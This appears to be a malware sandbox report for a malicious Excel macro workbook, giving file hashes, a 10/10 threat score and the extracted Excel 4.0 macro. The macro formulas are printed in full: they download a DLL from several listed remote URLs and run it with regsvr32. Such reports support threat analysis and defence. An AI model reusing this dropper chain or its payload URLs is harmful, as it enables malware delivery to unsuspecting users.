Overview

overview

10

Static

static

10

b834ae0cc9...6.xlsm

windows7-x64

10

b834ae0cc9...6.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    b834ae0cc998615fa9a21eded0af0d8009167d77b10fad933d0d5f35b38c1fb6

  • Size

    30KB

  • Sample

    241120-xjqpys1cnf

  • MD5

    80aef7edfc9c272322aaea7038f55657

  • SHA1

    4d9557ec54d47beb0a0d2eee419d7ee9101b4c06

  • SHA256

    b834ae0cc998615fa9a21eded0af0d8009167d77b10fad933d0d5f35b38c1fb6

  • SHA512

    0fb2ef79c7e2f40d0eab8c13b4ca5021371b43830d8ce62b48653655bbfda74f44b16a114b251ea6cae06506a6bc3491846b9773a76e5bdc85f2597ebeed004e

  • SSDEEP

    384:n842JZPFhNjtOA7icg0SCdiVH2KgUrNU/qWhZOdBNPJM+kqr9eCgh0k5M2E6v:gHFhNZliH2ydFfPdkqstJhE6v

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://henrysfreshroast.com/6cc4ts0bkrOlXq/

http://consejosdeorlando.com/wp-includes/jxTbRk2DgQOIOyokR/

http://blog.centerking.top/wp-includes/DBq5jx/

http://polarrefrigeracao.com.br/fontes/y7QpO/

http://filmsetserie.dx.am/img/ghCY9J5KD1J/

https://vagbharati.in/wp-admin/nYBb/

http://advogadogoiania.com.br/wp-includes/O9Az4/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://henrysfreshroast.com/6cc4ts0bkrOlXq/","..\rfs.dll",0,0) =IF('LFEVE'!F11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://consejosdeorlando.com/wp-includes/jxTbRk2DgQOIOyokR/","..\rfs.dll",0,0)) =IF('LFEVE'!F13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://blog.centerking.top/wp-includes/DBq5jx/","..\rfs.dll",0,0)) =IF('LFEVE'!F15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://polarrefrigeracao.com.br/fontes/y7QpO/","..\rfs.dll",0,0)) =IF('LFEVE'!F17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://filmsetserie.dx.am/img/ghCY9J5KD1J/","..\rfs.dll",0,0)) =IF('LFEVE'!F19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://vagbharati.in/wp-admin/nYBb/","..\rfs.dll",0,0)) =IF('LFEVE'!F21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://advogadogoiania.com.br/wp-includes/O9Az4/","..\rfs.dll",0,0)) =IF('LFEVE'!F23<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\rfs.dll") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://henrysfreshroast.com/6cc4ts0bkrOlXq/

Targets

    • Target

      b834ae0cc998615fa9a21eded0af0d8009167d77b10fad933d0d5f35b38c1fb6

    • Size

      30KB

    • MD5

      80aef7edfc9c272322aaea7038f55657

    • SHA1

      4d9557ec54d47beb0a0d2eee419d7ee9101b4c06

    • SHA256

      b834ae0cc998615fa9a21eded0af0d8009167d77b10fad933d0d5f35b38c1fb6

    • SHA512

      0fb2ef79c7e2f40d0eab8c13b4ca5021371b43830d8ce62b48653655bbfda74f44b16a114b251ea6cae06506a6bc3491846b9773a76e5bdc85f2597ebeed004e

    • SSDEEP

      384:n842JZPFhNjtOA7icg0SCdiVH2KgUrNU/qWhZOdBNPJM+kqr9eCgh0k5M2E6v:gHFhNZliH2ydFfPdkqstJhE6v

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks